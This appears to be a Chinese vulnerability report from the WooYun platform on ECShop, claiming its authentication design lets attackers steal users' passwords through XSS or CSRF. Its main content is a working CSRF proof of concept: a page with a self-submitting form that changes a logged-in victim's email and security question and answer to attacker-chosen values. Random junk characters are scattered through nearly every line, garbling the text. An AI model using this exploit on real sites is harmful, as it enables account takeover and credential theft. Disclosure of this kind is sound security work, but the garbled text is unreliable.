简要描述:
1 Q& D1 ?& I: i6 R7 B5 Cecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现5 j; e# \ P2 f" u/ e/ r
2 u2 v8 v' h; Q r
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
6 l- Q; d2 `- ^6 Q8 m
1 Q3 Z- i* T# v9 D1 n详细说明:
9 v2 h2 s& Q7 w$ P! f利用csrf和xss可以突破官方所说的“障碍”( s2 q& ~ c( v% g
xss版本已经有人说明+ C+ l5 B- e( L% L! @* e% C
这里给出csrf版本' V, ^- a5 l6 G, e4 j
% O5 R4 m- k( s4 ^* X9 U0 ~
漏洞证明:8 h) l j. V/ v
<html>
/ q8 e7 w. _* p. o<body>
# C2 ]$ M: q$ A8 d+ J i. a/ _( b<form action="http://www.wooyun.org/ecshop/user.php" method="POST">5 Z* Y4 \0 q3 ^
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">0 j: S2 Y7 g6 G7 F! u0 W: I+ u
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
8 ]1 i6 i( ?3 B5 O( Y5 U. |; f$ B<INPUT TYPE="text" NAME="sel_question" value="ecshop">: @; w* F: e2 N/ X7 s% c
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
2 E7 K6 c2 J6 |2 n$ W</body>+ E1 M0 ]1 c: Y4 f5 A; A. }
<script>
- Y# s% ~; B! r( s! J# `document.forms[0].submit();
# w* I: C8 K. n/ T- o2 H</script>, G. I% m z' u p
</html>1 j9 X5 m: i, j$ D6 J
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
# m1 E$ j7 q" j- Z4 v
( z0 I( b' r: { |